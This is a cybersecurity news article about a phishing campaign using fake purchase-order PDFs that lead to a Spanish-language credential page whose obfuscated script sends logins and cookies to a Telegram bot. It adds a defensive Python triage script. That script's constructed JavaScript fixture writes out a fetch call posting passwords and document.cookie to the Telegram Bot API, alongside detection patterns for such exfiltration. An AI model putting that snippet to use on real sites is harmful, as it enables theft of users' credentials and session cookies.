
The malicious file, titled “NEW Purchase Order #52177236.pdf”, was first flagged after Malwarebytes blocked access to a suspicious link embedded within the document.
Malicious PDF Targets Business Emails
The PDF appeared to contain a purchase order with a button labeled “View Document”, adding a sense of legitimacy. However, hovering over the button revealed a long, deceptive URL hosted on a subdomain of ionoscloud.com, the domain of IONOS Cloud, a legitimate European cloud service provider.
Attackers are increasingly abusing reputable infrastructure such as IONOS Cloud, AWS, and Azure because domains from trusted providers are less likely to be automatically blocked by security software.
When the victim clicks the button, the link redirects to a fake PDF viewer hosted on a compromised website, which pre-fills the recipient’s email address in a login form. The page prompts users to log in with a “business email login,” tricking them into providing corporate credentials.
This broad prompt is meant to capture credentials that could unlock valuable enterprise accounts, such as Microsoft Outlook, Google Workspace, VPNs, or file-sharing systems.
The fraudulent site appeared in Spanish, beginning with the greeting “Estimado,” suggesting a regional focus on Spanish-speaking organizations.
Obfuscated JavaScript Sends Stolen Data to Telegram
Security researchers investigating the phishing infrastructure discovered a heavily obfuscated JavaScript file spanning over 113,000 lines of code.
Upon deobfuscation, the script revealed several layers that collected not only usernames and passwords but also additional metadata including browser type, operating system, language, screen size, IP-based geolocation, and even cookies.
Further analysis showed that the stolen data was transmitted directly to the attacker’s Telegram bot, using a hardcoded chat ID (5485275217).

Telegram’s encrypted messaging makes it a convenient hub for threat actors, enabling the instant relay of stolen information without maintaining their own servers.
Researchers also found multiple similar PDFs on VirusTotal that linked to the same IONOS Cloud subdomain, indicating the campaign’s wide distribution and the automated deployment of cloned phishing templates.
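As an added example (not code from the article or from the analyzed campaign), the following triage script applies the two observations above to constructed samples: it extracts /URI link actions from a PDF fragment and flags those pointing at rented cloud subdomains, and it scans a deobfuscated JavaScript fragment for Telegram Bot API calls with a hardcoded chat_id alongside browser-metadata harvesting. The sample PDF, the sample script, the bot token and the chat_id are all placeholders, and the cloud-suffix list is an assumed heuristic.

```python
import re
from urllib.parse import urlparse

# Constructed minimal PDF fragment (not the campaign's file): one link annotation whose
# /URI action points at a cloud-hosted path, as the article describes.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Annot /Subtype /Link /Rect [100 100 300 150]
/A << /S /URI /URI (https://example-tenant.ionoscloud.com/view/doc?u=victim%40example.com) >> >> endobj
"""

# Constructed, already-deobfuscated JavaScript fragment (not the real 113,000-line script);
# the bot token and chat_id are placeholders.
SAMPLE_JS = """
var d = {u: user, p: pass, ua: navigator.userAgent, lang: navigator.language,
  scr: screen.width + "x" + screen.height, ck: document.cookie};
fetch("https://api.telegram.org/bot0000000000:PLACEHOLDERTOKEN/sendMessage",
  {method: "POST", body: JSON.stringify({chat_id: "1234567890", text: JSON.stringify(d)})});
"""

# Assumed heuristic: hosting providers whose subdomains the article names as abused.
CLOUD_SUFFIXES = ("ionoscloud.com", "amazonaws.com", "azurewebsites.net", "blob.core.windows.net")
URI_ACTION = re.compile(rb"/S\s*/URI\s*/URI\s*\(([^)]+)\)")
TELEGRAM_BOT = re.compile(r"api\.telegram\.org/bot(\d+):[A-Za-z0-9_-]+/(\w+)")
CHAT_ID = re.compile(r"chat_id\W+(\d{5,})")
HARVEST_PROPS = ("document.cookie", "navigator.userAgent", "navigator.language", "screen.width")


def pdf_link_findings(pdf: bytes) -> list:
    """Extract /URI link actions and mark those that resolve to a rented cloud subdomain."""
    findings = []
    for m in URI_ACTION.finditer(pdf):
        url = m.group(1).decode("latin-1")
        host = urlparse(url).hostname or ""
        cloud = any(host == s or host.endswith("." + s) for s in CLOUD_SUFFIXES)
        findings.append({"url": url, "host": host, "cloud_hosted": cloud})
    return findings


def js_exfil_findings(js: str) -> dict:
    """Flag Telegram Bot API calls, hardcoded chat IDs and browser-metadata collection."""
    bots = [(m.group(1), m.group(2)) for m in TELEGRAM_BOT.finditer(js)]  # (bot id, API method)
    chat_ids = CHAT_ID.findall(js)
    harvested = [p for p in HARVEST_PROPS if p in js]
    return {"telegram_methods": bots, "chat_ids": chat_ids, "harvested": harvested,
            "suspicious": bool(bots and chat_ids)}


if __name__ == "__main__":
    print(pdf_link_findings(SAMPLE_PDF))
    print(js_exfil_findings(SAMPLE_JS))
```

A positive hit on both checks (cloud-hosted link action in the attachment, Telegram sendMessage plus a fixed chat_id in the landing page script) is a strong signal to block the host and hunt for other attachments linking to the same subdomain, as the researchers did on VirusTotal.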
Staying Safe from PDF Phishing Traps
Organizations are urged to handle unsolicited purchase order attachments with caution. Verify such documents directly with the sender before opening or clicking on any embedded links.
Real-time protection tools like Malwarebytes Premium and Scam Guard can detect and block these malicious links. Using a password manager also helps prevent accidental credential entry on counterfeit sites.
Weaponized PDFs remain a persistent phishing tactic; one click can hand over your business credentials directly to cybercriminals.
The post Watch Out for Weaponized PDF Purchase Orders Containing Hidden Malicious Scripts appeared first on Cyber Security News.
